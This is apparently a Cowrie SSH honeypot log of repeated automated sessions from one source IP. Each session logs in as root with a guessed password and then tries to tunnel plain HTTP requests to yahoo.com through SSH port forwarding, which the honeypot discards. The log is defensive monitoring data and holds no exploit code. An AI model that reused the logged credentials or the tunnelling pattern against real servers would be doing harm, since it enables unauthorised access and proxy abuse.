{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:39.874340Z","src_ip":"213.209.150.239","session":"e73de5f6e575"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":1722,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:1722","sensor":"my-vps","timestamp":"2025-08-26T01:03:40.009476Z","session":"e73de5f6e575"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:40.056802Z","src_ip":"213.209.150.239","session":"e73de5f6e575"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:40.105157Z","src_ip":"213.209.150.239","session":"e73de5f6e575"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":27992,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e48f398ea60","protocol":"ssh","message":"New connection: 213.209.150.239:27992 (1.2.3.4:22) [session: 2e48f398ea60]","sensor":"my-vps","timestamp":"2025-08-26T01:03:40.151374Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:40.152125Z","src_ip":"213.209.150.239","session":"2e48f398ea60"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:40.199605Z","src_ip":"213.209.150.239","session":"2e48f398ea60"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:40.434942Z","src_ip":"213.209.150.239","session":"2e48f398ea60"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":29433,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:29433","sensor":"my-vps","timestamp":"2025-08-26T01:03:40.483644Z","session":"2e48f398ea60"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:40.530921Z","src_ip":"213.209.150.239","session":"2e48f398ea60"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":17685,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:17685","sensor":"my-vps","timestamp":"2025-08-26T01:03:40.665708Z","session":"2e48f398ea60"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:40.713133Z","src_ip":"213.209.150.239","session":"2e48f398ea60"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:40.760995Z","src_ip":"213.209.150.239","session":"2e48f398ea60"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":28042,"dst_ip":"1.2.3.4","dst_port":22,"session":"bdae92c8f84e","protocol":"ssh","message":"New connection: 213.209.150.239:28042 (1.2.3.4:22) [session: bdae92c8f84e]","sensor":"my-vps","timestamp":"2025-08-26T01:03:40.807304Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:40.808211Z","src_ip":"213.209.150.239","session":"bdae92c8f84e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:40.855434Z","src_ip":"213.209.150.239","session":"bdae92c8f84e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:41.090859Z","src_ip":"213.209.150.239","session":"bdae92c8f84e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":7089,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:7089","sensor":"my-vps","timestamp":"2025-08-26T01:03:41.138978Z","session":"bdae92c8f84e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:41.186155Z","src_ip":"213.209.150.239","session":"bdae92c8f84e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":3082,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:3082","sensor":"my-vps","timestamp":"2025-08-26T01:03:41.321447Z","session":"bdae92c8f84e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:41.368530Z","src_ip":"213.209.150.239","session":"bdae92c8f84e"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:41.416411Z","src_ip":"213.209.150.239","session":"bdae92c8f84e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":28083,"dst_ip":"1.2.3.4","dst_port":22,"session":"31a44e72180e","protocol":"ssh","message":"New connection: 213.209.150.239:28083 (1.2.3.4:22) [session: 31a44e72180e]","sensor":"my-vps","timestamp":"2025-08-26T01:03:41.472034Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:41.472926Z","src_ip":"213.209.150.239","session":"31a44e72180e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:41.529455Z","src_ip":"213.209.150.239","session":"31a44e72180e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:41.811660Z","src_ip":"213.209.150.239","session":"31a44e72180e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":897,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:897","sensor":"my-vps","timestamp":"2025-08-26T01:03:41.869916Z","session":"31a44e72180e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:41.926620Z","src_ip":"213.209.150.239","session":"31a44e72180e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":6750,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:6750","sensor":"my-vps","timestamp":"2025-08-26T01:03:42.082973Z","session":"31a44e72180e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:42.139665Z","src_ip":"213.209.150.239","session":"31a44e72180e"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:42.197127Z","src_ip":"213.209.150.239","session":"31a44e72180e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":28137,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9e89bf67a55","protocol":"ssh","message":"New connection: 213.209.150.239:28137 (1.2.3.4:22) [session: b9e89bf67a55]","sensor":"my-vps","timestamp":"2025-08-26T01:03:42.252739Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:42.253496Z","src_ip":"213.209.150.239","session":"b9e89bf67a55"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:42.310548Z","src_ip":"213.209.150.239","session":"b9e89bf67a55"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:42.593131Z","src_ip":"213.209.150.239","session":"b9e89bf67a55"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":2443,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:2443","sensor":"my-vps","timestamp":"2025-08-26T01:03:42.650782Z","session":"b9e89bf67a55"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:42.707602Z","src_ip":"213.209.150.239","session":"b9e89bf67a55"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":17252,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:17252","sensor":"my-vps","timestamp":"2025-08-26T01:03:42.863062Z","session":"b9e89bf67a55"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:42.919813Z","src_ip":"213.209.150.239","session":"b9e89bf67a55"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:42.977854Z","src_ip":"213.209.150.239","session":"b9e89bf67a55"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":28193,"dst_ip":"1.2.3.4","dst_port":22,"session":"700d401090e2","protocol":"ssh","message":"New connection: 213.209.150.239:28193 (1.2.3.4:22) [session: 700d401090e2]","sensor":"my-vps","timestamp":"2025-08-26T01:03:43.024114Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:43.025446Z","src_ip":"213.209.150.239","session":"700d401090e2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:43.072559Z","src_ip":"213.209.150.239","session":"700d401090e2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:43.307837Z","src_ip":"213.209.150.239","session":"700d401090e2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":28621,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:28621","sensor":"my-vps","timestamp":"2025-08-26T01:03:43.356212Z","session":"700d401090e2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:43.403642Z","src_ip":"213.209.150.239","session":"700d401090e2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":20011,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:20011","sensor":"my-vps","timestamp":"2025-08-26T01:03:43.541631Z","session":"700d401090e2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:43.588732Z","src_ip":"213.209.150.239","session":"700d401090e2"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:43.637056Z","src_ip":"213.209.150.239","session":"700d401090e2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":28251,"dst_ip":"1.2.3.4","dst_port":22,"session":"538274d8d0aa","protocol":"ssh","message":"New connection: 213.209.150.239:28251 (1.2.3.4:22) [session: 538274d8d0aa]","sensor":"my-vps","timestamp":"2025-08-26T01:03:43.692908Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:43.703284Z","src_ip":"213.209.150.239","session":"538274d8d0aa"}
